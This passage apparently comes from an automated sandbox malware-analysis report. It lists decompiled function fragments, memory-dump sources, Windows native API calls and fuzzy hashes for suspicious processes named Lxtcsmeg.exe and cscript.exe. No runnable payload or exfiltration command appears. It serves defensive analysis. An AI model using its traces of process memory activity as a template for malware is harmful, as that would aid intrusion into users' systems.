				_push(_t13);
				E04AD5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04AD5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04adfdda
0x04adfde2
0x04adfde5
0x04adfdec
0x04adfdfa
0x04adfdff
0x04adfe0a
0x04adfe0f
0x04adfe17
0x04adfe1e
0x04adfe19
0x04adfe19
0x04adfe19
0x04adfe20
0x04adfe21
0x04adfe22
0x04adfe25
0x04adfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04ADFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04ADFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04ADFE2B

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5bb0b556ba2f4d0b6a25ace2ed3a26a8764447bb75d47637f01dfe11001bd430
Instruction ID: 43a3f46ec686393d42bcecaa431a6eb4f7e04670450a85497231378fd5576bd8
Opcode Fuzzy Hash: 5bb0b556ba2f4d0b6a25ace2ed3a26a8764447bb75d47637f01dfe11001bd430
Instruction Fuzzy Hash: E6F0F072600201BFEB201A45DD02F23BB6AFB84B31F244354F629565E1EA62F8209AF4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Lxtcsmeg.exe PID: 5740 Parent PID: 3424 Lxtcsmeg.exeCOMMON

Executed Functions

Non-executed Functions

Function 03802467, Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

l\V, xrefs: 038025C3
ql\V, xrefs: 0380250E
i^]i, xrefs: 03802631
3[]i, xrefs: 0380257D
]m\V, xrefs: 0380261C
7l\V, xrefs: 03802569
l\V, xrefs: 038024B5

Memory Dump Source

Source File: 00000009.00000003.749121453.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000009.00000003.751081117.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i$ql\V$l\V
API String ID: 0-4241164054
Opcode ID: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction ID: bfc65f6d31bc559a0ca0d049309234ca42e438a9891dab69de2b3ab1a2c0abc7
Opcode Fuzzy Hash: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction Fuzzy Hash: 8F4131738446045FE710CAE8EC562E6F7BEFB1473076405A7DC00CF522E6A1A55B8BD1

Uniqueness

Uniqueness Score: -1.00%

Function 038C2097, Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

l\V, xrefs: 038C20E5
]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199
l\V, xrefs: 038C21F3
i^]i, xrefs: 038C2261
ql\V, xrefs: 038C213E
3[]i, xrefs: 038C21AD

Memory Dump Source

Source File: 00000009.00000003.755237665.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i$ql\V$l\V
API String ID: 0-4241164054
Opcode ID: 9cf0c30d5acab74af1eba7420ec507d0970f6ee6996157bf61585585a0131b7a
Instruction ID: a25565ea2f583622e794493645cb09607aa91396c0c9354fe81207a8986c5385
Opcode Fuzzy Hash: 9cf0c30d5acab74af1eba7420ec507d0970f6ee6996157bf61585585a0131b7a
Instruction Fuzzy Hash: 6B41F0738552445BEB10CAA8E8422E6F7BEFB5473076405ABDD00CF522E631E55B8BD1

Uniqueness

Uniqueness Score: -1.00%

Function 03802576, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

l\V, xrefs: 038025C3
i^]i, xrefs: 03802631
3[]i, xrefs: 0380257D
]m\V, xrefs: 0380261C
7l\V, xrefs: 03802569

Memory Dump Source

Source File: 00000009.00000003.749121453.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000009.00000003.751081117.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i
API String ID: 0-435519228
Opcode ID: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction ID: d0a4a829d51db47f5c0c4b427f0157b270bbbeeae7de06ff054866d80b8165ff
Opcode Fuzzy Hash: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction Fuzzy Hash: 3921FE7385524A9FEB10CFA8E8921D6F3B9FB4033076400A6D8008F852E261A46BCBE5

Uniqueness

Uniqueness Score: -1.00%

Function 038C21A6, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199
l\V, xrefs: 038C21F3
i^]i, xrefs: 038C2261
3[]i, xrefs: 038C21AD

Memory Dump Source

Source File: 00000009.00000003.755237665.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i
API String ID: 0-435519228
Opcode ID: 1a001a2f75d4fa2ba1d9e311f7508e4a41fed56ac3fa9dff848cb281120ab4fd
Instruction ID: 46be0601ef524627dd7b147ad9ef327be57243490e7d8d440874d70e98ec74a7
Opcode Fuzzy Hash: 1a001a2f75d4fa2ba1d9e311f7508e4a41fed56ac3fa9dff848cb281120ab4fd
Instruction Fuzzy Hash: B821AF7385524A9FEB10CFA4A4821D2F7B9FB5172076401AADC009F812E631E56BDBD1

Uniqueness

Uniqueness Score: -1.00%

Function 03802505, Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

l\V, xrefs: 038025C3
i^]i, xrefs: 03802631
]m\V, xrefs: 0380261C
7l\V, xrefs: 03802569

Memory Dump Source

Source File: 00000009.00000003.749121453.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Associated: 00000009.00000003.751081117.0000000003800000.00000004.00000001.sdmp Download File
Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$7l\V$]m\V$i^]i
API String ID: 0-1990758405
Opcode ID: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction ID: 3fc394077c858d84741b203a8343acd1d31067182828c4d8739e81f37f74d22c
Opcode Fuzzy Hash: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction Fuzzy Hash: D531CC738546059FDB50CFA4E8925E6F7BAFB1473076405E6D8008F812E372A56B8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 038C2135, Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

]m\V, xrefs: 038C224C
7l\V, xrefs: 038C2199
l\V, xrefs: 038C21F3
i^]i, xrefs: 038C2261

Memory Dump Source

Source File: 00000009.00000003.755237665.00000000038C0000.00000004.00000001.sdmp, Offset: 0384C000, based on PE: false

Associated: 00000009.00000003.775363651.000000000384C000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: l\V$7l\V$]m\V$i^]i
API String ID: 0-1990758405
Opcode ID: 600cfef7c0ed6caaff1ef174aaf7d5d2a81a5446b5c581721feef592f1ef565c
Instruction ID: 1732a6b49833ac58faf03fba6cd6aab939821cddd462aa0d307df84258a256dd
Opcode Fuzzy Hash: 600cfef7c0ed6caaff1ef174aaf7d5d2a81a5446b5c581721feef592f1ef565c
Instruction Fuzzy Hash: B63197728542499FDB10CAA4E4825E2F3BAFB1473076445AAD8008B812E631F46B8BE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Lxtcsmeg.exe PID: 6868 Parent PID: 3424 Lxtcsmeg.exeCOMMON

Executed Functions

Non-executed Functions

Function 03802467, Relevance: 8.9, Strings: 7, Instructions: 192COMMON

Download Yara Rule

Strings

7l\V, xrefs: 03802569
3[]i, xrefs: 0380257D
l\V, xrefs: 038024B5
ql\V, xrefs: 0380250E
l\V, xrefs: 038025C3
]m\V, xrefs: 0380261C
i^]i, xrefs: 03802631

Memory Dump Source

Source File: 0000000A.00000003.792830551.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i$ql\V$l\V
API String ID: 0-4241164054
Opcode ID: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction ID: bfc65f6d31bc559a0ca0d049309234ca42e438a9891dab69de2b3ab1a2c0abc7
Opcode Fuzzy Hash: 1cfecf92b277f1127450c1a02dc5bb0ad80a61e80706c04008f3008b01bafa7f
Instruction Fuzzy Hash: 8F4131738446045FE710CAE8EC562E6F7BEFB1473076405A7DC00CF522E6A1A55B8BD1

Uniqueness

Uniqueness Score: -1.00%

Function 03802576, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

7l\V, xrefs: 03802569
3[]i, xrefs: 0380257D
l\V, xrefs: 038025C3
]m\V, xrefs: 0380261C
i^]i, xrefs: 03802631

Memory Dump Source

Source File: 0000000A.00000003.792830551.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Similarity

API ID:
String ID: l\V$3[]i$7l\V$]m\V$i^]i
API String ID: 0-435519228
Opcode ID: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction ID: d0a4a829d51db47f5c0c4b427f0157b270bbbeeae7de06ff054866d80b8165ff
Opcode Fuzzy Hash: 4c2a37786e1de0098514a467bde8269a5f1800b32b007f56f287c8d2adde55fa
Instruction Fuzzy Hash: 3921FE7385524A9FEB10CFA8E8921D6F3B9FB4033076400A6D8008F852E261A46BCBE5

Uniqueness

Uniqueness Score: -1.00%

Function 03802505, Relevance: 5.1, Strings: 4, Instructions: 120COMMON

Download Yara Rule

Strings

7l\V, xrefs: 03802569
l\V, xrefs: 038025C3
]m\V, xrefs: 0380261C
i^]i, xrefs: 03802631

Memory Dump Source

Source File: 0000000A.00000003.792830551.0000000003800000.00000004.00000001.sdmp, Offset: 03800000, based on PE: false

Similarity

API ID:
String ID: l\V$7l\V$]m\V$i^]i
API String ID: 0-1990758405
Opcode ID: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction ID: 3fc394077c858d84741b203a8343acd1d31067182828c4d8739e81f37f74d22c
Opcode Fuzzy Hash: 7fdbbe7c01cb2f7898c0da8ef35e16be08f823c6cf3229f48e82a5510a0bfad6
Instruction Fuzzy Hash: D531CC738546059FDB50CFA4E8925E6F7BAFB1473076405E6D8008F812E372A56B8BE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 6820 Parent PID: 3424 cscript.exeCOMMON

Executed Functions

Function 003E8632, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,003E3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003E3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 003E862D

Strings

.z`, xrefs: 003E861D, 003E8628

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 6b93ad1ddb1ef26995ca940dfeca201a72d76e43ce04af4ad95e98f27c12b242
Instruction ID: d9b422c589836a2731d1304174ec9accb6f9e670d8151c5d1550e166bde18e94
Opcode Fuzzy Hash: 6b93ad1ddb1ef26995ca940dfeca201a72d76e43ce04af4ad95e98f27c12b242
Instruction Fuzzy Hash: 2D11D4B6204508AFCB18DF99DC81DEB77A9EF8C754B258648FA5DD7240D630E812CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E85E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,003E3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003E3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 003E862D

Strings

.z`, xrefs: 003E861D, 003E8628

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 433b7b12e9e93615e4c06c6e0fd8945706f7bcc3fb15ed5edb1d2125ae977e07
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: EDF0BDB2204208AFCB08CF89DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003E868A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:>,FFFFFFFF,?,r=>,?,00000000), ref: 003E86D5

Strings

1:>, xrefs: 003E86AC, 003E86B8

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: 1:>
API String ID: 2738559852-1042322791
Opcode ID: 8fff885dca5adcc78e9514efa51d1551746d3cfa2d952a5cb4fbe01e33bf9237
Instruction ID: 560b75eb7f3ccb71c5ff75f537220a92e277071a1a4fd93fc85bdf0abc74217c
Opcode Fuzzy Hash: 8fff885dca5adcc78e9514efa51d1551746d3cfa2d952a5cb4fbe01e33bf9237
Instruction Fuzzy Hash: 01F0E7B2200209AFCB14CF99CC85EEB77A9EF8C354F158649BA5D97290D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E8690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:>,FFFFFFFF,?,r=>,?,00000000), ref: 003E86D5

Strings

1:>, xrefs: 003E86AC, 003E86B8

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: 1:>
API String ID: 2738559852-1042322791
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 71a6da7f53cd4d39e47863b17388125ecab956c30b81e67d94dfe09301edc3fc
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A7F0A4B2200208AFCB14DF89DC85EEB77ADAF8C754F158249BA1D97241D630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E870A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=>,?,?,003E3D50,00000000,FFFFFFFF), ref: 003E8735

Strings

P=>, xrefs: 003E872C, 003E8734

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: P=>
API String ID: 3535843008-947167927
Opcode ID: 40ee66b37e9d985dee38cfc489fb7666bac61a9fce2302cea7ec5f0c30a5dffd
Instruction ID: 3e4652bafc5ecebd448ab9b2485325fcc2b7a47635191babbf35bf39aca4a592
Opcode Fuzzy Hash: 40ee66b37e9d985dee38cfc489fb7666bac61a9fce2302cea7ec5f0c30a5dffd
Instruction Fuzzy Hash: B2D02BAE40D2C40FCB11EAB468C50D37B40DD506247155BCFD8A407603C134960AD3D1

Uniqueness

Uniqueness Score: -1.00%

Function 003E8710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=>,?,?,003E3D50,00000000,FFFFFFFF), ref: 003E8735

Strings

P=>, xrefs: 003E872C, 003E8734

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: P=>
API String ID: 3535843008-947167927
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7d29feb6ea0243ea58ba7a209ab4aa98a16fb613fe63858b610a4dc432a5dd53
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 26D01776200214ABD710EB99CC89FA77BACEF48760F154599BA189B282C530FA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 003E87C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003E87F9

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 7b70a4a8e5bc194cccfdd6520471151da548f80bdc784504ac60557c55476f1f
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 0AF015B2200218AFCB14DF89CC81EAB77ADAF88750F118249FE0897241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E87BC, Relevance: 1.5, APIs: 1, Instructions: 28memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003E87F9

Memory Dump Source

Source File: 0000000C.00000002.945274610.00000000003D0000.00000040.00020000.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 92dbf67e5de15a13fc0ece3dd90b0c1f92995939bc4fe68a697e70750e352e82
Instruction ID: 4bc58a0eb059fd3542162269f70f4a3ca15fc960ef8ed455fc076dda2305b5f5
Opcode Fuzzy Hash: 92dbf67e5de15a13fc0ece3dd90b0c1f92995939bc4fe68a697e70750e352e82
Instruction Fuzzy Hash: 22F030B5104149AFCB14EF59DC84CA777A9BF88220B15865EF95897202C231E915CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 048695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048695DA

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94ddf0c75385a3d296374261072693bc4392ed96a92101ca03e3671812454d5c
Instruction ID: 7ec426a3b6c071ac4fd2ba2edb6199d346575db6ea4ffae54eed3bc359139f8f
Opcode Fuzzy Hash: 94ddf0c75385a3d296374261072693bc4392ed96a92101ca03e3671812454d5c
Instruction Fuzzy Hash: 369002A120200003710571594424616444A9BE0245B51C521E200A6A1DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 04869540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486954A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c5ff1b72215ef3dce3d483f1c264d67e7f9a36c4f38e5abf34b30e4b1e600d33
Instruction ID: f11903cb25a891864617eb8e98d9d1680ee1dd46f5425c35fc55550901d656aa
Opcode Fuzzy Hash: c5ff1b72215ef3dce3d483f1c264d67e7f9a36c4f38e5abf34b30e4b1e600d33
Instruction Fuzzy Hash: 75900265211000033105A559071450704869BD5395351C521F200B661CD661D8656161

Uniqueness

Uniqueness Score: -1.00%

Function 048696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048696DA

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88ac88085e813dacfbaee245be3c58c69f160a3683242850de5877897089ba45
Instruction ID: 8a4363fb8598812b385560b916bcc49e099cc56c9516faee921cf96dfefb37e2
Opcode Fuzzy Hash: 88ac88085e813dacfbaee245be3c58c69f160a3683242850de5877897089ba45
Instruction Fuzzy Hash: 2890027120100842F10061594414B4604459BE0345F51C516A111A765D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 048696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048696EA

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1121116d0718b51957a7fcf2a5bc2bab9d7b30beaab99b8bc707ecd1814685f2
Instruction ID: 84c29249f041328b1323746a9297c32cfdceedd130da9d65302ac5928e655881
Opcode Fuzzy Hash: 1121116d0718b51957a7fcf2a5bc2bab9d7b30beaab99b8bc707ecd1814685f2
Instruction Fuzzy Hash: 0490027120108802F1106159841474A04459BD0345F55C911A541A769D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 04869650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486965A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98cae6b4c9b2f8acab21b05a08c154a6e9bea97ac2d5e625a7ff43975890ea1f
Instruction ID: 2d75f6bda0d5a4cf671b05b76b27178aae0c9907d32a131b21b6cc149056484e
Opcode Fuzzy Hash: 98cae6b4c9b2f8acab21b05a08c154a6e9bea97ac2d5e625a7ff43975890ea1f
Instruction Fuzzy Hash: C790027120504842F14071594414A4604559BD0349F51C511A105A7A5D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04869660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486966A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36a6a5320f224804a08b38dd83d15cfc8be86c984d301cd965c6b1a440de626f
Instruction ID: 051f73eb86d72a86cf44ffc8705a64d4e9698c10bf83c13ebdd16c5af10d8d6b
Opcode Fuzzy Hash: 36a6a5320f224804a08b38dd83d15cfc8be86c984d301cd965c6b1a440de626f
Instruction Fuzzy Hash: A390027120100802F1807159441464A04459BD1345F91C515A101B765DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04869780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486978A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d4632d5c09baa6de05520d40674114849875d5b109a05c0a8f5d1859cb5c4563
Instruction ID: 01fd4a17cc9d6a2f8b184aec1ec1219e31b10556a1fb6e371177e99fcc73ea2a
Opcode Fuzzy Hash: d4632d5c09baa6de05520d40674114849875d5b109a05c0a8f5d1859cb5c4563
Instruction Fuzzy Hash: 8890026921300002F1807159541860A04459BD1246F91D915A100B669CC955D86D6361

Uniqueness

Uniqueness Score: -1.00%

Function 04869FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04869FEA

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db1b1e7b3dbfd01bde9a751651092467c13b3140460da781245a5764ee724c0f
Instruction ID: 5f9d488b55615830da48413d9754eab122d9134c45911136dd563676ccb0835e
Opcode Fuzzy Hash: db1b1e7b3dbfd01bde9a751651092467c13b3140460da781245a5764ee724c0f
Instruction Fuzzy Hash: DB90027131114402F1106159841470604459BD1245F51C911A181A669D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 04869710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486971A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3537979cfdd8e7754b4d717c17def60ad99259e961aab478878981296d75d238
Instruction ID: 05f7525d5f6199a037aa031e97483d86cc545b9f820b70def7421ef98b985398
Opcode Fuzzy Hash: 3537979cfdd8e7754b4d717c17def60ad99259e961aab478878981296d75d238
Instruction Fuzzy Hash: 0090027120100402F1006599541864604459BE0345F51D511A601A666EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 04869840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0486984A

Memory Dump Source

Source File: 0000000C.00000002.949262942.0000000004800000.00000040.00000001.sdmp, Offset: 04800000, based on PE: true

Associated: 0000000C.00000002.950243936.000000000491B000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.950265043.000000000491F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0e54942185958396a8cddf3d24efb4929bfcffe369331509e26692ffb7d0c36c
Instruction ID: f45389f635d27f78a085a02a07b5c1ba0361b1f95112f61915355a3e106072c6
Opcode Fuzzy Hash: 0e54942185958396a8cddf3d24efb4929bfcffe369331509e26692ffb7d0c36c
Instruction Fuzzy Hash: 5E900261242041527545B15944145074446ABE0285791C512A240AA61C8566E85AE661

